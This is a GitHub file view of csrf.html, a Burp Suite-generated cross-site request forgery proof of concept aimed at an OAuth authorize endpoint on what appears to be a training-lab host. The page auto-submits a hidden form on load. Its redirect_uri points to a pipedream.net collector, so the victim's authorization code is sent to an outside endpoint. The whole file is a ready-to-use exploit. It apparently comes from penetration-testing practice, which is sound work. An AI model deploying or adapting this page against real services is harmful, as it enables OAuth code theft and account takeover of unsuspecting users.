-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathcsrf.html
More file actions
18 lines (18 loc) · 1.16 KB
/
csrf.html
File metadata and controls
18 lines (18 loc) · 1.16 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body onload="document.getElementById('csrf').submit()">
<form action="http://authorization-ptl-df6521cb-867e48b1.libcurl.so/oauth/authorize" method="POST" id="csrf">
<input type="hidden" name="utf8" value="✓" />
<input type="hidden" name="authenticity_token" value="656TwEkTmkEkRh/R8SKSbhakrtP3TzCr+f7zZbaY2SgEEdetGPwz7GzCzD4G72BIMHkhfRF9LTeZsKXqn6RxEw==" />
<input type="hidden" name="client_id" value="cc8e180000a79b3460ea064dd298b7c9fe6b3b6471c88e34b8a6c78c68c22ef9" />
<input type="hidden" name="redirect_uri" value="https://eoeuz5cmr7sxxni.m.pipedream.net" />
<input type="hidden" name="state" value="" />
<input type="hidden" name="response_type" value="code" />
<input type="hidden" name="scope" value="" />
<input type="hidden" name="code_challenge" value="" />
<input type="hidden" name="code_challenge_method" value="" />
<input type="hidden" name="commit" value="Authorize" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>